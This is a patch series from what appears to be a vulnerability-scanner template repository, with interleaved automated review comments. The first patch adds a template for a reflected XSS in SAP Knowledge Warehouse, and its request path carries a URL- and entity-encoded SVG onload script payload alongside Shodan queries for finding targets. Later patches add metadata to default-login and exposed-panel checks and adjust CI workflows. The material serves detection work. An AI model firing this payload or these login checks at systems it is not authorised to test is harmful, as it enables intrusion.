From 8c12450b093c5cd83ac5227c12fb93a5a29d3160 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Wed, 23 Mar 2022 16:13:38 +0530
Subject: [PATCH 1/7] Added CVE-2021-42063 (#3956)
---
 cves/2021/CVE-2021-42063.yaml | 41 +++++++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 cves/2021/CVE-2021-42063.yaml
diff --git a/cves/2021/CVE-2021-42063.yaml b/cves/2021/CVE-2021-42063.yaml
new file mode 100644
index 0000000000..38c3f6d98e
--- /dev/null
+++ b/cves/2021/CVE-2021-42063.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-42063
+
+info:
+  name: SAP Knowledge Warehouse (KW) - Reflected XSS
+  author: pdteam
+  severity: medium
+  description: |
+    A security vulnerability has been discovered in the SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50. The usage of one SAP KW component within a Web browser enables unauthorized attackers to conduct XSS attacks, which might lead to disclose sensitive data.
+  reference:
+    - https://seclists.org/fulldisclosure/2022/Mar/32
+    - https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
+    - https://twitter.com/MrTuxracer/status/1505934549217382409
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42063
+  metadata:
+    shodan-query:
+      - 'SAP NetWeaver Application Server'
+      - 'http.component:"SAP"'
+  tags: cve,cve2021,sap,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ""
+          - "SAPIKS2"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
From a9024cc6f400a7b54a3c75d07e09e89c373f2320 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 23 Mar 2022 10:43:58 +0000
Subject: [PATCH 2/7] Auto Generated New Template Addition List [Wed Mar 23 10:43:58 UTC 2022] :robot:
---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 52adcdd1d3..6210a6bfa2 100644
--- a/.new-additions
+++ b/.new-additions
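Review bot: `description: |` keeps the trailing newline of the block scalar as part of the description value; the text is a single paragraph, so `description: |-` (or `>-`) drops that newline and avoids a stray line break wherever the description is rendered. Separately, the first entry of the body word matcher reads as an empty string `- ""` in this rendering; if the file really holds an empty word it matches every response body and the `and` condition collapses to just `SAPIKS2`, so confirm the entry carries the intended reflection marker rather than a tag stripped by the page. The classification block for this template is added by a later patch in the series, so its absence here is not raised.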
@@ -2,6 +2,7 @@ cnvd/2021/CNVD-2021-14536.yaml
 cves/2020/CVE-2020-17456.yaml
 cves/2020/CVE-2020-27467.yaml
 cves/2021/CVE-2021-41691.yaml
+cves/2021/CVE-2021-42063.yaml
 cves/2022/CVE-2022-0437.yaml
 exposed-panels/beyondtrust-login-server.yaml
 exposed-panels/beyondtrust-panel.yaml
From 83ecf7060b154b8da590993b24e38d1ceb757b84 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 23 Mar 2022 10:44:27 +0000
Subject: [PATCH 3/7] Auto Generated CVE annotations [Wed Mar 23 10:44:27 UTC 2022] :robot:
---
 cves/2021/CVE-2021-42063.yaml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/cves/2021/CVE-2021-42063.yaml b/cves/2021/CVE-2021-42063.yaml
index 38c3f6d98e..e9cc437e9a 100644
--- a/cves/2021/CVE-2021-42063.yaml
+++ b/cves/2021/CVE-2021-42063.yaml
@@ -16,6 +16,11 @@ info:
       - 'SAP NetWeaver Application Server'
       - 'http.component:"SAP"'
   tags: cve,cve2021,sap,xss
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-42063
+    cwe-id: CWE-79
 
 requests:
   - method: GET
From 5a0cea7a1d63caba4fe60ebe2b7ab13bf2afc9d8 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Wed, 23 Mar 2022 09:33:16 -0400
Subject: [PATCH 4/7] Dashboard Content Enhancements (#3958)
Dashboard Content Enhancements
---
 default-logins/alibaba/canal-default-login.yaml | 10 ++++++++++
 .../alphaweb/alphaweb-default-login.yaml | 13 +++++++++++--
 default-logins/ambari/ambari-default-login.yaml | 12 +++++++++++-
 default-logins/apache/airflow-default-login.yaml | 13 +++++++++++--
 default-logins/apache/apisix-default-login.yaml | 16 +++++++++++++---
 default-logins/apollo/apollo-default-login.yaml | 11 ++++++++++-
 default-logins/arl/arl-default-login.yaml | 10 +++++++++-
 .../digitalrebar/digitalrebar-default-login.yaml | 14 ++++++++++++--
 .../mantisbt/mantisbt-default-credential.yaml | 14 ++++++++++++--
 .../stackstorm/stackstorm-default-login.yaml | 13 +++++++++++--
 dns/caa-fingerprint.yaml | 15 ++++++++++++---
 exposed-panels/active-admin-exposure.yaml | 10 ++++++++++
 exposed-panels/activemq-panel.yaml | 10 ++++++++++
 13 files changed, 142 insertions(+), 19 deletions(-)
diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml
index a4c4a1b801..7d2892ee31 100644
--- a/default-logins/alibaba/canal-default-login.yaml
+++ b/default-logins/alibaba/canal-default-login.yaml
@@ -3,8 +3,16 @@ id: canal-default-login
 info:
   name: Alibaba Canal Default Login
   author: pdteam
+  description: An Alibaba Canal default login was discovered.
   severity: high
   tags: alibaba,default-login
+  reference:
+    - https://github.com/alibaba/canal/wiki/ClientAdapter
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -33,3 +41,5 @@ requests:
         words:
           - 'data":{"token"'
           - '"code":20000'
+
+# Enhanced by mp on 2022/03/22
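Review bot: `cve-id:` in the new classification block is written with no value, which a YAML loader reads as null rather than as an empty string or empty list; the same bare key appears in every other file section of this patch (alphaweb, ambari, airflow, apisix, apollo, arl, digitalrebar, mantisbt, stackstorm, caa-fingerprint, active-admin, activemq). If the intent is "no CVE", either drop the key or make the value explicit, e.g. `cve-id: []`, whichever the template schema accepts — the schema is not visible from this diff. The added `description: An Alibaba Canal default login was discovered.` also only restates the template name; a sentence saying what a match implies (that the documented default credentials still authenticate) would be more useful to whoever triages the finding, and the same applies to the descriptions in the other sections.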
diff --git a/default-logins/alphaweb/alphaweb-default-login.yaml b/default-logins/alphaweb/alphaweb-default-login.yaml
index 6532087439..459227780c 100644
--- a/default-logins/alphaweb/alphaweb-default-login.yaml
+++ b/default-logins/alphaweb/alphaweb-default-login.yaml
@@ -4,8 +4,15 @@ info:
   name: AlphaWeb XE Default Login
   author: Lark Lab
   severity: medium
+  description: An AlphaWeb XE default login was discovered.
   tags: default-login
-  reference: https://wiki.zenitel.com/wiki/AlphaWeb
+  reference:
+    - https://wiki.zenitel.com/wiki/AlphaWeb
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+    cvss-score: 5.8
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -32,4 +39,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml
index e251839b56..3ebcf4c474 100644
--- a/default-logins/ambari/ambari-default-login.yaml
+++ b/default-logins/ambari/ambari-default-login.yaml
@@ -3,8 +3,16 @@ id: ambari-default-login
 info:
   name: Apache Ambari Default Login
   author: pdteam
-  severity: medium
+  description: An Apache Ambari default admin login was discovered.
+  severity: high
   tags: ambari,default-login,apache
+  reference:
+    - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -24,3 +32,5 @@ requests:
           - '"Users" : {'
           - 'AMBARI.'
         condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/apache/airflow-default-login.yaml b/default-logins/apache/airflow-default-login.yaml
index 0e15190cd6..30411f2786 100644
--- a/default-logins/apache/airflow-default-login.yaml
+++ b/default-logins/apache/airflow-default-login.yaml
@@ -3,11 +3,18 @@ id: airflow-default-login
 info:
   name: Apache Airflow Default Login
   author: pdteam
-  severity: critical
+  severity: high
   tags: airflow,default-login,apache
-  reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
+  description: An Apache Airflow default login was discovered.
+  reference:
+    - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
   metadata:
     shodan-query: title:"Sign In - Airflow"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -54,3 +61,5 @@ requests:
       - type: word
         words:
           - 'You should be redirected automatically to target URL: '
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/apache/apisix-default-login.yaml b/default-logins/apache/apisix-default-login.yaml
index e3e9553a9a..926c485277 100644
--- a/default-logins/apache/apisix-default-login.yaml
+++ b/default-logins/apache/apisix-default-login.yaml
@@ -1,14 +1,22 @@
 id: apisix-default-login
 
 info:
-  name: Apache Apisix Default Login
+  name: Apache Apisix Default Admin Login
   author: pdteam
-  severity: critical
+  severity: high
   tags: apisix,apache,default-login
+  description: An Apache Apisix default admin login was discovered.
   metadata:
     shodan-query: title:"Apache APISIX Dashboard"
     fofa-query: title="Apache APISIX Dashboard"
     product: https://apisix.apache.org
+  reference:
+    - https://apisix.apache.org/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -39,4 +47,6 @@ requests:
           - '"data"'
           - '"token"'
           - '"code":0'
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/apollo/apollo-default-login.yaml b/default-logins/apollo/apollo-default-login.yaml
index 285bc75250..820ce3f661 100644
--- a/default-logins/apollo/apollo-default-login.yaml
+++ b/default-logins/apollo/apollo-default-login.yaml
@@ -4,10 +4,17 @@ info:
   name: Apollo Default Login
   author: PaperPen
   severity: high
+  description: An Apollo default login was discovered.
   metadata:
     shodan-query: http.favicon.hash:11794165
-  reference: https://github.com/apolloconfig/apollo
+  reference:
+    - https://github.com/apolloconfig/apollo
   tags: apollo,default-login
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -47,3 +54,5 @@ requests:
           - "status_code_1 == 302 && status_code_2 == 200"
           - "contains(tolower(all_headers_2), 'application/json')"
         condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml
index a7c16e40a9..9c0ac754fe 100644
--- a/default-logins/arl/arl-default-login.yaml
+++ b/default-logins/arl/arl-default-login.yaml
@@ -1,10 +1,16 @@
 id: arl-default-login
 
 info:
-  name: ARL Default Login
+  name: ARL Default Admin Login
   author: pikpikcu
+  description: An ARL default admin login was discovered.
   severity: high
   tags: arl,default-login
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -35,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/digitalrebar/digitalrebar-default-login.yaml b/default-logins/digitalrebar/digitalrebar-default-login.yaml
index f4b5228acc..edbd669ad2 100644
--- a/default-logins/digitalrebar/digitalrebar-default-login.yaml
+++ b/default-logins/digitalrebar/digitalrebar-default-login.yaml
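Review bot: The arl-default-login info block is the only one in this patch that gains a `classification` but no `reference` list, so the template still cites nothing for where the default credentials it tests are documented. Adding `reference:` with the project's upstream URL, as the other twelve sections do, keeps the series consistent; the ARL upstream is not visible from this hunk, so the URL is left to the author. The request body that actually exercises the login is outside the hunk and was not reviewed.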
@@ -1,11 +1,19 @@
 id: digitalrebar-default-login
 
 info:
-  name: RackN Digital Rebar provision default login
+  name: RackN Digital Rebar Default Login
   author: c-sh0
   severity: high
-  reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
+  description: A RackN Digital Rebar default login was discovered.
+  reference:
+    - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
+    - https://rackn.com/
   tags: rackn,digitalrebar,default-login
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -38,3 +46,5 @@ requests:
           - 'Name'
           - 'Secret'
         condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/mantisbt/mantisbt-default-credential.yaml b/default-logins/mantisbt/mantisbt-default-credential.yaml
index dfd4987666..f83a08252f 100644
--- a/default-logins/mantisbt/mantisbt-default-credential.yaml
+++ b/default-logins/mantisbt/mantisbt-default-credential.yaml
@@ -1,12 +1,20 @@
 id: mantisbt-default-credential
 
 info:
-  name: MantisBT Default Credential
+  name: MantisBT Default Admin Login
   author: For3stCo1d
   severity: high
+  description: A MantisBT default admin login was discovered.
+  reference:
+    - https://mantisbt.org/
   metadata:
     shodan-query: title:"MantisBT"
   tags: mantisbt,default-login
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -34,4 +42,6 @@ requests:
 
       - type: status
         status:
-          - 302
\ No newline at end of file
+          - 302
+
+# Enhanced by mp on 2022/03/22
diff --git a/default-logins/stackstorm/stackstorm-default-login.yaml b/default-logins/stackstorm/stackstorm-default-login.yaml
index e27c21aad5..13c6a1b5d9 100644
--- a/default-logins/stackstorm/stackstorm-default-login.yaml
+++ b/default-logins/stackstorm/stackstorm-default-login.yaml
@@ -4,10 +4,17 @@ info:
   name: StackStorm Default Login
   author: PaperPen
   severity: high
+  description: A StackStorm default admin login was discovered.
   metadata:
     fofa-query: app="stackstorm"
-  reference: https://github.com/StackStorm/st2-docker
+  reference:
+    - https://github.com/StackStorm/st2-docker
   tags: stackstorm,default-login
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id:
+    cwe-id: CWE-522
 
 requests:
   - raw:
@@ -35,4 +42,6 @@ requests:
 
       - type: status
         status:
-          - 201
\ No newline at end of file
+          - 201
+
+# Enhanced by mp on 2022/03/22
diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml
index 192f355a03..61d140a973 100644
--- a/dns/caa-fingerprint.yaml
+++ b/dns/caa-fingerprint.yaml
@@ -1,11 +1,18 @@
 id: caa-fingerprint
 
 info:
-  name: CAA Fingerprint
+  name: CAA Record
   author: pdteam
+  description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.
   severity: info
-  reference: https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record
+  reference:
+    - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record
   tags: dns,caa
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cve-id:
+    cwe-id: CWE-200
 
 dns:
   - name: "{{FQDN}}"
@@ -22,4 +29,6 @@ dns:
         regex:
           - 'issue "(.*)"'
           - 'issuewild "(.*)"'
-          - 'iodef "(.*)"'
\ No newline at end of file
+          - 'iodef "(.*)"'
+
+# Enhanced by mp on 2022/03/22
diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml
index f4bdf291e6..48d7326c31 100644
--- a/exposed-panels/active-admin-exposure.yaml
+++ b/exposed-panels/active-admin-exposure.yaml
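Review bot: `cwe-id: CWE-200` in the dns/caa-fingerprint.yaml section classifies a CAA record as an information exposure, but the description added in the same hunk says the record exists precisely to tell CAs which issuers may sign for the domain — it is public by design, and the metrics on the line above (`C:N/I:N/A:N`, score 0.0) already state that nothing is exposed. Dropping `cwe-id` from this block, or leaving it empty like `cve-id`, avoids tagging an informational DNS fingerprint with a weakness it does not have; if the project requires a CWE in every classification block, a comment above the key saying so would stop the next reader from asking. The two exposed-panels sections later in the patch reuse CWE-200, where a reachable admin panel is at least arguably an exposure, so the point is raised only here.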
@@ -4,7 +4,15 @@ info:
   name: ActiveAdmin Admin Dasboard Exposure
   author: pdteam
   severity: info
+  description: An ActiveAdmin Admin dashboard was discovered.
   tags: panel,activeadmin
+  reference:
+    - https://activeadmin.info/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cve-id:
+    cwe-id: CWE-200
 
 requests:
   - method: GET
@@ -16,3 +24,5 @@ requests:
           - "active_admin_content"
           - "active_admin-"
         condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml
index a269d2dfe1..52daaf3deb 100644
--- a/exposed-panels/activemq-panel.yaml
+++ b/exposed-panels/activemq-panel.yaml
@@ -4,7 +4,15 @@ info:
   name: Apache ActiveMQ Exposure
   author: pdteam
   severity: info
+  description: An Apache ActiveMQ implementation was discovered.
+  reference:
+    - https://activemq.apache.org/
   tags: panel,activemq,apache
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0.0
+    cve-id:
+    cwe-id: CWE-200
 
 requests:
   - method: GET
@@ -17,3 +25,5 @@ requests:
          - '
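Review bot: `name: ActiveAdmin Admin Dasboard Exposure`, the first context line of the exposed-panels/active-admin-exposure.yaml hunk, misspells "Dashboard", and the description added right below it spells the word correctly, so the two now disagree. Since this commit is already editing the info block, it is the place to fix it: `name: ActiveAdmin Admin Dashboard Exposure`. The matcher words in the second hunk are unaffected.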

Welcome to the Apache ActiveMQ!

'
          - 'Apache ActiveMQ'
        condition: and
+
+# Enhanced by mp on 2022/03/22
From b6212b7529490f899b1258b1fddbe84645d733a2 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 23 Mar 2022 20:55:35 +0530
Subject: [PATCH 6/7] workflow updates
---
 .github/workflows/new-templates.yml | 1 +
 .github/workflows/template-db-indexer.yml | 4 ++--
 2 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/.github/workflows/new-templates.yml b/.github/workflows/new-templates.yml
index 5188ff2a09..fa398b097e 100644
--- a/.github/workflows/new-templates.yml
+++ b/.github/workflows/new-templates.yml
@@ -9,6 +9,7 @@ on:
 jobs:
   templates:
     runs-on: ubuntu-latest
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     steps:
       - uses: actions/checkout@master
         with:
diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml
index 3fbda9c1e5..19f985b0c9 100644
--- a/.github/workflows/template-db-indexer.yml
+++ b/.github/workflows/template-db-indexer.yml
@@ -2,8 +2,8 @@ name: 📑 Template-DB Indexer
 
 on:
   push:
-    tags:
-      - '*'
+    branches:
+      - master
   workflow_dispatch:
 
 jobs:
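Review bot: The context line `- uses: actions/checkout@master` in the new-templates.yml hunk resolves the action from a mutable branch, so each run of this job executes whatever that branch holds at the time; the new `if: github.repository == 'projectdiscovery/nuclei-templates'` guard limits where the job runs, not what it runs. Pin the action to a release tag or, better, a full commit SHA — `- uses: actions/checkout@v3` or `@<full-commit-sha>` (placeholder) — so an upstream change to the branch cannot silently alter this workflow. The step list continues past the hunk, so the same check applies to any other `uses:` lines below it.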
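Review bot: The template-db-indexer.yml trigger now fires on every push to `master`, but unlike new-templates.yml in the same commit this job gets no `if: github.repository == 'projectdiscovery/nuclei-templates'` condition, so any fork that keeps a `master` branch will run the indexer on each push. Whether that matters depends on the job body, which is outside the hunk; if it publishes or touches anything with repository secrets, add the same repository condition on the job, and if it is harmless on forks a comment above `on:` saying so would save the next reader the question. The previous `tags:` trigger was also the only thing tying the index to releases, and the one-line commit message does not say why a per-push index is wanted — a sentence in the description would help.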